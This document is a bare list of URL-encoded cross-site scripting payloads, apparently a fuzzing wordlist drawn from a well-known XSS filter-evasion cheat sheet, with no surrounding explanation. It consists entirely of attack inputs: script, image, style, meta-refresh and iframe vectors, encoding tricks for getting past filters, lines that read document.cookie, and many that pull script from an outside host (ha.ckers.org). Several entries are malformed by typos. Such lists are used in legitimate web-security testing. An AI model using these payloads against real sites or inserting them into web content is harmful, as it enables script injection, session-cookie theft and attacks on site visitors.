%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
0%5C%22autofocus%2Fonfocus%3Dalert%281%29--%3E%3Cvideo%2Fposter%2Fonerror%3Dprompt%282%29%3E%22-confirm%283%29-%2
%3Cscript%2Fsrc%3Ddata%3A%2Calert%28%29%3E
%3Cmarquee%2Fonstart%3Dalert%28%29%3E
%3Cvideo%2Fposter%2Fonerror%3Dalert%28%29%3E
%3Cisindex%2Fautofocus%2Fonfocus%3Dalert%28%29%3E
%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
%3CIMG20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E
%3CIMG%20SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E
%3CIMG%20SRC%3Djavascript%3Aalert%28%22XSS%22%29%3E
%3CIMG%20SRC%3D%60javascript%3Aalert%28%22RSnke%20says%2C%20%27XSS%27%22%29%60%3E
%3Ca%20onmouseover%3D%22alert%28document.cookie%29%22%3Exxs%20link%3C%2Fa%3E
%3Ca%20onmouseover%3Dalert%28document.cookie%29%3Exxs%20link%3C%2Fa%3E
%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%2%3E
%3CIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E
%3CIMG%20SRC%3D%23%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E
%3CIMG%20SRC%3D%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E
%3CIMG%20onmouseover%3D%22alert%28%27xxs%27%9%22%3E
%3CIMG%20SRC%3D%2F%20onerror%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E%3C%2Fimg%3E
%3CIMG%20SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%262397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B
%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E
%3CIMG%20SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000103x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
%3CIMG%20SRC%3D%22jav%20%20%20ascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3D22jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3D%22%20%26%2314%3B%20%20javascript%3Aaert%28%27XSS%27%29%3B%22%3E
%3CSCRIPT%2FXSS%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
%3CBODY%20onload%21%23%24%25%26%28%29%2A~%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E
%3CSCRIPT%2FSRC%3D%22http%3A%2F%2Fa.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E
%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F%3C%20B%20%3E
%3CSCRIPT%20SRC%3D%2F%2Fha.ckers.org%2F.j%3E
%3CIMG%20SRC%3D%22javascript%3Aalert28%27XSS%27%29%22
%3Ciframe%20src%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%20%3C
%5C%22%3Balert%28%27XSS%27%29%3B%2F%2F
%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E
%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E
3CINPUT%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CBODY%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E
%3CIMG%20DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E
%3CIMG%20LOWSRC%3D%22javascript%3Aalert%28%27SS%27%29%22%3E
%3CSTYLE%3Eli%20%7Blist-style-image%3A%20url%28%22javascript%3Aalert%28%27XSS%27%29%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS%3C%2Fbr%3E
%3CIMG%20SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
%3CIMG%20SRC%3D%22livescript%3A%5Bcde%5D%22%3E
%3CBODY%20ONLOAD%3Dalert%28%27XSS%27%29%3E
%3CBGSOUND%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CBR%20SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E
%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B22%3E
%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
%3CMETA%20HTTP-EQUIV%3D%22Link%22%20Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxsscss%3E%3B%20REL%3Dstylesheet%22%3E
%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
%3CSTYLE%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Aalert%28%22XSS%22%29%27%3B%3C%2FSTYLE%3E
%3CIMG%20STYLE%3D%22xs%3Aexpr%2F%2AXSS%2A%2Fession%28alert%28%27XSS%27%29%29%22%3E
exp%2F%2A%3CA%20STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3B
xss%3Aex%2F%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E
%3CSTYLE%20TYPE%3D%22text%2Fjavascript%22%3alert%28%27XSS%27%29%3B%3C%2FSTYLE%3E
%3CSTYLE%3E.XSS%7Bbackground-image%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%3B%7D%3C%2FSTYLE%3E%3CA%20CLASS%3DXSS%3E%3C%2FA%3E
%3CSTYLE%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aaert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E
%3CXSS%20STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E
%3CXSS%20STYLE%3D%22behavior%3A%20url%28xss.htc%29%3B%22%3E
%C2%BCscript%C2%BEalert%28%C2%A2XSS%C2%A2%29%C2%BC%2Fscript%C2%BE
%3CMETA%20HTTP-EQUV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%20base64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
%3CMETA%20HTTP-EQUIV%3D%22refrsh%22%20CONTENT%3D%220%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E
%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert%28document.cookie%29%22%3E%3C%FIFRAME%3E
%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FFRAMESET%3E
%3CTABLE%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E
%3CTABLE%3E%3CTD%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E
%3CDIV%2STYLE%3D%22background-image%3A%20url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E
%3CDIV%20STYLE%3D%22background-image%3A%5C0075%5C0072%5C006C%5C0028%27%5C006a%5C0061%5C0076%5C0061%5C0073%5C0063%5C0072%5C0069%5C0070%5C0074%5C003a%5C0061%5C006c%5C0065%5C002%5C0074%5C0028.1027%5C0058.1053%5C0053%5C0027%5C0029%27%5C0029%22%3E
%3CDIV%20STYLE%3D%22background-image%3A%20url%28%26%231%3Bjavascript%3Aalert%28%27XSS%27%29%29%22%3E
%3CDIV%20STYLE%3D%22width%3A%20expression%28alert%28%27XSS%27%29%29%3B%22%3E
%3C%21-%5Bif%20gte%20IE%204%5D%3E%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E%3C%21%5Bendif%5D--%3E
%3CBASE%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E
%3COBJECT%20TYPE%3D%22text%2Fx-scriptlet%22%20DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscrptlet.html%22%3E%3C%2FOBJECT%3E
%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27%3CSCR%27%22--%3E%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27IPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E
%3C%3F%20echo%28%27%3CSCR%29%27%3Becho28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B%20%3F%3E
%3CIMG%20SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
%3CMETA%20HTTP-EQUIV%3D%22Set-Cookie%22%20Content%3D%22USERID%3D%3CSCRIPT%3Ealet%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E
%3CHEAD%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT%3D%22text%2Fhtml%3B%20charset%3DUTF-7%22%3E%20%3C%2FHEAD%3E%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-
%3CSCRIPT%20a%3D%22%3E%22%20SC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
%3CSCRIPT%20%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
%3CSCRIPT%20a%3D%22%3E%22%20%27%27%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3
%3CSCRIPT%20%22a%3D%27%3E%27%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
%3CSCRIPT%20a%3D%60%3E%60%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
%3CSCRIPT%20a%3D%22%3E%27%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckes.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
%3CA%20HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E
0%5C%22autofocus%2Fonocus%3Dalert%281%29--%3E%3Cvideo%2Fposter%2F%20error%3Dprompt%282%29%3E%22-confirm%283%29-%22
veris--%3Egroup%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%2F%2F
%23%22%3E%3Cimg%20src%3DM%20onerror%3Dalert%28%27XSS%27%29%3B%3E
element%5Battribute%3D%27%3Cimg%20sr%3Dx%20onerror%3Dalert%28%27XSS%27%29%3B%3E
%5B%3Cblockquote%20cite%3D%22%5D%22%3E%5B%22%20onmouseover%3D%22alert%28%27RVRSH3LL_XSS%27%29%3B%22%20%5D
%2522%3Balert%2528%2527RVRSH3LL_XSS%2529%2F%2F
javascript%3Aalert%25281%2529%3B
%3Cw%20contenteditable%20d%3Dx%20onfocus%3Dalert%28%29%3E
alert%3Bpg%28%22XSS%22%29
%3Csvg%2Fonload%3D%2526%2523097lert%2526lpar%3B1337%29%3E
%3Cscript%3Efor%28%28i%29in%28self%29%29eval%28i%29%281%29%3C%2Fscript%3E
%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C%2Fscr%3C%2Fscript%3Eipt%E%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C%2Fscr%3C%2Fscript%3Eipt%3E
%3CsCR%3Cscript%3EiPt%3Ealert%281%29%3C%2FSCr%3C%2Fscript%3EIPt%3E
%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4%3D%22%3Etest%3C%2Fa%3E

